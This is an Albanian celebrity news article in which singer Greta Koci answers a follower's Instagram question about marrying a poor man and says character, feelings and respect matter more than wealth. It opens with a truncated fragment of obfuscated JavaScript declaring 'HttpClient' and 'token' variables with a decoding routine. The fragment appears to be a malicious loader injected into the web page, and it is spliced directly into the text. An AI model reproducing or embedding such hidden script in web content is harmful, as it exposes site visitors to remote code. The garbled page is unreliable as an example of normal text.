;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A do martohej vallë Greta Koci me një burrë të varfër?

By

Eksizton një paragjykim i përgjithshëm, se vajzat e famshme nuk zgjedhin për partnerë burra të cilët kanë standard solid të jetesës.

Një pyetje që shpesh sillet në tavolinat tona e jo rrallë iu bëhet vajzave është se a do martoheshin me një burrë të varfër?!

Po e njëjta pyetje iu bë edhe këngëtares Greta Koci në seksionin e pyetjeve të Instagramit, pasi këngëtarja vendosi të ndajë kohë e t’iu përgjigjet ndjekësve të saj në pyetjet që ata mund të kishin për të.

Dhe përgjigja e Gretës në këtë rast erdhi goxha e elaboruar!

“Pyetje gjysmake disi! Sepse nuk zgjidhet njeriu i jetës vetëm nga ky kriter “i pasur” apo i varfër. Ka shumë arsye të tjera pse nejriu vendos të lidh jetën me dikë. Ndjenja, karakteri, personaliteti, arsimi, sjellja, respekti e mirëkuptimi. Partneri nuk është thjesht një burrë, është ose duhet të jetë të paktën për mua shok edhe krah, është njeriu që ti i beson”, ka shkruar Greta, dhe përgjigja e saj lë të nënkuptohet se nuk e ka pasurinë materiale tejet të rëndësishme sa i përket zgjedhjes së partnerit. /Prive.al

Artikuj të ngjashëm